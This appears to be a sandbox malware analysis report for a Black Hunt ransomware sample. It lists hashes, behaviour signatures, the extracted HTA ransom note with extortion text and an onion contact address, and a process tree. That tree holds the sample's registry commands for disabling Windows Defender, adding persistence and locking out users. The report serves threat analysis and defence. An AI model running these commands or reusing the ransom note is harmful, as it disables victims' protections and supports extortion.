Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    18/01/2024, 22:27

General

  • Target

    0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe

  • Size

    707KB

  • MD5

    2fefd34de03404153a505291b8a0cceb

  • SHA1

    bbd7c6d175567824a388e8d25378121c00aef233

  • SHA256

    0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca

  • SHA512

    297d1a9cbaab8f23c172a31f9380e63195b7ed83353c654e49dc37734863bd95a2d592c0195f3e9749f1c834a6b8e6e2751195ac5261e02103879f0994b4deb9

  • SSDEEP

    6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1T8nvnh:6uaTmkZJ+naie5OTamgEoKxLWavh

Malware Config

Extracted

Path

F:\#BlackHunt_ReadMe.hta

Ransom Note
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="x-ua-compatible" content="ie=9"><meta charset="UTF-8"><HTA:APPLICATION icon="#" WINDOWSTATE="maximize" scroll="no" SELECTION="yes" contextmenu="no" caption="yes" SYSMENU="no" innerBorder="yes" SHOWINTASKBAR="yes" singleInstance="yes" /><meta name="viewport" content="width = device-width,initial-scale=1.0"><style>a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,small,span,strike,strong,sub,summary,sup,table,tbody,td,tfoot,th,thead,time,tr,tt,u,ul,var,video{margin:0;padding:0;border:0;font-size:100%;font:inherit;vertical-align:baseline}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:'';content:none}table{border-collapse:collapse;border-spacing:0}</style><style>body,html{background-color:#dadada;font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;font-weight:600;font-size:16px}a{text-decoration:none;color:#0483ab}div.header{margin-top:15px;margin-bottom:5px;width:100%}div.header h1{width:97%;text-align:left;font-size:30px;font-weight:900;margin:auto}div.header h1 span#black{display:inline-block;color:#000;margin-right:0;padding:2px 2px}div.header h1 span#hunter{display:inline-block;color:#e90303;background-color:#000;padding:2px 8px;margin-left:0}div.header h1 span#hunter span#version{font-size:12px}div.message div.head-encrypted-msg{width:100%}div.message div.head-encrypted-msg h1{font-size:330%;width:97%;margin:auto;text-align:center;font-weight:700}div.message div.head-encrypted-msg h1 span{display:inline-block;color:#000;background-color:#e90303;padding:0 8px 0 8px;margin-right:3px}div.message div.head-attention-msg{width:97%;margin:auto;text-align:center;margin-top:1%;border:1px solid #e90303;background-color:#f1caca;border-radius:5px;font-size:250%;padding-top:10px;padding-bottom:10px}div.message div.head-attention-msg p{margin-bottom:.5%}div.message div.head-attention-msg p span{color:#e90303}div.content{margin:auto;margin-top:2%}div.content div.content-head-msg{font-size:32px;text-align:left;font-weight:600}div.content div.content-boxes{margin:auto;margin-top:2%}div.content div.box{width:96%;margin:auto;border-radius:5px;margin-bottom:30px}div.content div.content-left-box{background-color:#c5cfd8;padding:40px 0 40px 20px;font-size:24px;position:relative;border-left:15px solid #1878cf}div.content div.content-left-box h3.left-box-title{background-color:#1878cf;display:inline-block;padding:10px 10px;border-radius:5px;color:#fff;position:absolute;top:-22px;margin-left:auto;margin-right:auto;left:0;right:0;width:20%;text-align:center}div.content div.content-left-box div.content-contact-directly *{font-weight:600!important;line-height:1.4em}div.content div.content-left-box div.content-contact-directly h4{font-size:24px;font-weight:500;margin-top:8px}div.content div.content-left-box div.content-contact-directly h4#tox{font-weight:600;display:inline-block;margin-left:3px}div.content div.content-left-box div.content-contact-directly div.tox-id{margin-left:6%}div.content div.content-left-box div.content-contact-directly h4#tox-id{font-size:24px}div.content div.content-left-box div.content-contact-directly p#tox-id-p{font-size:16px}div.content div.content-left-box div.content-contact-directly h4#download-tox{display:inline-block;margin-left:6%}div.content div.content-left-box div.content-contact-directly p#download-tox-p{display:inline-block}div.content div.content-left-box div.content-contact-directly h4#email{display:inline-block;font-weight:600;margin-left:3px}div.content div.content-left-box div.content-contact-directly p#email-p{display:inline-block;font-size:24px;margin-left:8px}div.content div.content-left-box div.content-contact-directly h4#user-id{font-weight:500;margin-left:3px}div.content div.content-left-box div.content-contact-directly h4#user-id span{color:#e90303}div.content div.content-left-box div.content-contact-tor{margin-top:50px;font-weight:600!important}div.content div.content-left-box div.content-contact-tor h3{font-size:24px}div.content div.content-left-box div.content-contact-tor h3 span{color:#e90303}div.content div.content-left-box div.content-contact-tor div.content-tor-inside{margin-left:6;margin-top:10px}div.content div.content-left-box div.content-contact-tor div.content-tor-inside p{margin-top:8px}div.content div.content-left-box div.content-contact-tor div.content-tor-inside p img{position:relative;bottom:-3px}div.content div.content-right-box{background-color:#efb0b0;padding:40px 0 40px 20px;font-size:24px;position:relative;border-left:15px solid #e90303}div.content div.content-right-box h3.right-box-title{background-color:#e90303;display:inline-block;padding:10px 10px;border-radius:5px;color:#fff;position:absolute;top:-22px;margin-left:auto;margin-right:auto;left:0;right:0;width:20%;text-align:center}div.content div.content-right-box p{color:#000;font-size:22px;font-weight:600;margin-top:9px;line-height:1.4em}div.content div.content-left-box p{color:#000;font-size:22px;font-weight:600;margin-top:9px;line-height:1.4em}div.content div.content-left-box p span{color:#e90303;font-weight:700;font-size:24px}</style><title>Black Hunt</title></head><body><div class="header"><h1><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIMAAAAWCAYAAADjNi+WAAAACXBIWXMAAC4jAAAuIwF4pT92AAALpWlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNi4wLWMwMDIgNzkuMTY0NDYwLCAyMDIwLzA1LzEyLTE2OjA0OjE3ICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0RXZ0PSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VFdmVudCMiIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bWxuczpwaG90b3Nob3A9Imh0dHA6Ly9ucy5hZG9iZS5jb20vcGhvdG9zaG9wLzEuMC8iIHhtbG5zOnRpZmY9Imh0dHA6Ly9ucy5hZG9iZS5jb20vdGlmZi8xLjAvIiB4bWxuczpleGlmPSJodHRwOi8vbnMuYWRvYmUuY29tL2V4aWYvMS4wLyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgMjEuMiAoV2luZG93cykiIHhtcDpDcmVhdGVEYXRlPSIyMDIyLTEwLTEzVDEyOjMyOjAyKzAzOjMwIiB4bXA6TWV0YWRhdGFEYXRlPSIyMDIzLTA0LTA3VDA0OjIxOjI1KzA0OjMwIiB4bXA6TW9kaWZ5RGF0ZT0iMjAyMy0wNC0wN1QwNDoyMToyNSswNDozMCIgZGM6Zm9ybWF0PSJpbWFnZS9wbmciIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6NGRiOTQ5OGItYTg5Mi0yMTRjLTliYzgtZTZlMDM3ZTYzYmJkIiB4bXBNTTpEb2N1bWVudElEPSJhZG9iZTpkb2NpZDpwaG90b3Nob3A6ZGVlODIyNjgtMDA3Ni0wNDQ2LWFjMGEtMzk2OTY3MzA0YTdjIiB4bXBNTTpPcmlnaW5hbERvY3VtZW50SUQ9InhtcC5kaWQ6MjcyMzA2NjctZDM0ZC1lMjRmLWJlNTUtMDQyMWY2MmY3ZWI1IiBwaG90b3Nob3A6Q29sb3JNb2RlPSIzIiBwaG90b3Nob3A6SUNDUHJvZmlsZT0ic1JHQiBJRUM2MTk2Ni0yLjEiIHRpZmY6T3JpZW50YXRpb249IjEiIHRpZmY6WFJlc29sdXRpb249IjMwMDAwMDAvMTAwMDAiIHRpZmY6WVJlc29sdXRpb249IjMwMDAwMDAvMTAwMDAiIHRpZmY6UmVzb2x1dGlvblVuaXQ9IjIiIGV4aWY6Q29sb3JTcGFjZT0iMSIgZXhpZjpQaXhlbFhEaW1lbnNpb249IjQ0OSIgZXhpZjpQaXhlbFlEaW1lbnNpb249Ijg5Ij4gPHhtcE1NOkhpc3Rvcnk+IDxyZGY6U2VxPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0iY3JlYXRlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDoyNzIzMDY2Ny1kMzRkLWUyNGYtYmU1NS0wNDIxZjYyZjdlYjUiIHN0RXZ0OndoZW49IjIwMjItMTAtMTNUMTI6MzI6MDIrMDM6MzAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCAyMS4yIChXaW5kb3dzKSIvPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0ic2F2ZWQiIHN0RXZ0Omluc3RhbmNlSUQ9InhtcC5paWQ6NzU5MzVkMTMtYjM0OS02ZTRiLWIwODctYzc5ZTJmZGNiNzgwIiBzdEV2dDp3aGVuPSIyMDIyLTEwLTEzVDEyOjMyOjE0KzAzOjMwIiBzdEV2dDpzb2Z0d2FyZUFnZW50PSJBZG9iZSBQaG90b3Nob3AgMjEuMiAoV2luZG93cykiIHN0RXZ0OmNoYW5nZWQ9Ii8iLz4gPHJkZjpsaSBzdEV2dDphY3Rpb249InNhdmVkIiBzdEV2dDppbnN0YW5jZUlEPSJ4bXAuaWlkOmJiMmZiMmMyLWRjNDUtMzE0Yy1iMmQxLWRjNzFlZGUwNWJlYSIgc3RFdnQ6d2hlbj0iMjAyMy0wNC0wN1QwNDoyMToyNSswNDozMCIgc3RFdnQ6c29mdHdhcmVBZ2VudD0iQWRvYmUgUGhvdG9zaG9wIDIxLjIgKFdpbmRvd3MpIiBzdEV2dDpjaGFuZ2VkPSIvIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJjb252ZXJ0ZWQiIHN0RXZ0OnBhcmFtZXRlcnM9ImZyb20gYXBwbGljYXRpb24vdm5kLmFkb2JlLnBob3Rvc2hvcCB0byBpbWFnZS9wbmciLz4gPHJkZjpsaSBzdEV2dDphY3Rpb249ImRlcml2ZWQiIHN0RXZ0OnBhcmFtZXRlcnM9ImNvbnZlcnRlZCBmcm9tIGFwcGxpY2F0aW9uL3ZuZC5hZG9iZS5waG90b3Nob3AgdG8gaW1hZ2UvcG5nIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJzYXZlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDo0ZGI5NDk4Yi1hODkyLTIxNGMtOWJjOC1lNmUwMzdlNjNiYmQiIHN0RXZ0OndoZW49IjIwMjMtMDQtMDdUMDQ6MjE6MjUrMDQ6MzAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCAyMS4yIChXaW5kb3dzKSIgc3RFdnQ6Y2hhbmdlZD0iLyIvPiA8L3JkZjpTZXE+IDwveG1wTU06SGlzdG9yeT4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6YmIyZmIyYzItZGM0NS0zMTRjLWIyZDEtZGM3MWVkZTA1YmVhIiBzdFJlZjpkb2N1bWVudElEPSJhZG9iZTpkb2NpZDpwaG90b3Nob3A6YTU3NzljMGQtYzI3Zi05ZjQ2LWJmMjgtYjQ2MzIzZjQ5ZjQxIiBzdFJlZjpvcmlnaW5hbERvY3VtZW50SUQ9InhtcC5kaWQ6MjcyMzA2NjctZDM0ZC1lMjRmLWJlNTUtMDQy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 " alt=""></h1></div><div class="message"><div class="head-encrypted-msg"><h1>YOUR<span>WHOLE NETWORK</span>HAS BEEN PENETRATED BY<span>Black Hunt</span>!</h1></div><div class="head-attention-msg"><p>We also have uploaded your sensitive data, which we Will leak or sell in case of no cooperation!</p><p><span>Restore your data possible only buying private key from us</span></p></div></div><div class="content"><div class="content-boxes"><div class="content-right-box box"><h3 class="right-box-title">ATTENTION</h3><p>remember, there are many middle man services out there pretending that they can recover or decrypt your files , whom neither will contact us or scam you, Remember we are first and last solution for your files otherwise you will only waste money and time</p><p>trying to decrypt your files without our decryptor and through third party softwares will make your files completely useless, there is no third party decryptor since we are the only key holders</p><p>we have uploaded many critical data and information from your machines , we won't leak or sell any of them in Case of successful Corporation, however if we don't hear from you in 14 days we will either sell or leak your data in many forums</p><p></p><p>Remain all of your files untouched, do not change their name, extension and...</p></div><div class="content-left-box box"><h3 class="left-box-title">CONTACT US</h3><p>Your system is offline. in order to contact us you can email this address<span> [email protected] </span>this ID (<span> bebKpzVdBLL522Sp </span>) for the title of your email.</p><p>If you weren't able to contact us whitin 24 hours please email:<span> [email protected] </span></p><p>Check your data situation in<a href="#"><span> http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion </span></a></p></div></div></div></body></html>
URLs

http-equiv="x-ua-compatible"

http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion

Signatures

  • Deletes NTFS Change Journal 2 TTPs 1 IoCs

    The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (2707) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 5 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe
    "C:\Users\Admin\AppData\Local\Temp\0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe"
    1⤵
    • UAC bypass
    • Checks whether UAC is enabled
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2360
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
        3⤵
        • Modifies registry class
        PID:2624
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      2⤵
        PID:2692
        • C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
          3⤵
          • Modifies registry class
          PID:388
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
        2⤵
          PID:2872
          • C:\Windows\system32\reg.exe
            reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
            3⤵
            • Modifies registry class
            PID:1952
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
          2⤵
            PID:2884
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
              3⤵
              • Modifies registry class
              PID:1816
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
            2⤵
              PID:3036
              • C:\Windows\system32\reg.exe
                reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
                3⤵
                • Adds Run key to start application
                PID:2560
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
              2⤵
                PID:2720
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                  3⤵
                    PID:1804
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                  2⤵
                    PID:2316
                    • C:\Windows\system32\reg.exe
                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                      3⤵
                      • Modifies Windows Defender Real-time Protection settings
                      PID:2864
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
                    2⤵
                      PID:2748
                      • C:\Windows\system32\reg.exe
                        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
                        3⤵
                          PID:2156
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
                        2⤵
                          PID:2840
                          • C:\Windows\system32\reg.exe
                            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
                            3⤵
                              PID:2012
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
                            2⤵
                              PID:3000
                              • C:\Windows\system32\reg.exe
                                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
                                3⤵
                                  PID:2900
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
                                2⤵
                                  PID:1972
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
                                    3⤵
                                      PID:1604
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
                                    2⤵
                                      PID:2844
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
                                        3⤵
                                          PID:1984
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
                                        2⤵
                                          PID:2632
                                          • C:\Windows\system32\reg.exe
                                            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
                                            3⤵
                                              PID:2332
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
                                            2⤵
                                              PID:2644
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
                                                3⤵
                                                  PID:1656
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
                                                2⤵
                                                  PID:2600
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
                                                    3⤵
                                                      PID:1036
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
                                                    2⤵
                                                      PID:2664
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
                                                        3⤵
                                                          PID:1820
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
                                                        2⤵
                                                          PID:1484
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
                                                            3⤵
                                                              PID:1048
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                            2⤵
                                                              PID:1940
                                                              • C:\Windows\system32\reg.exe
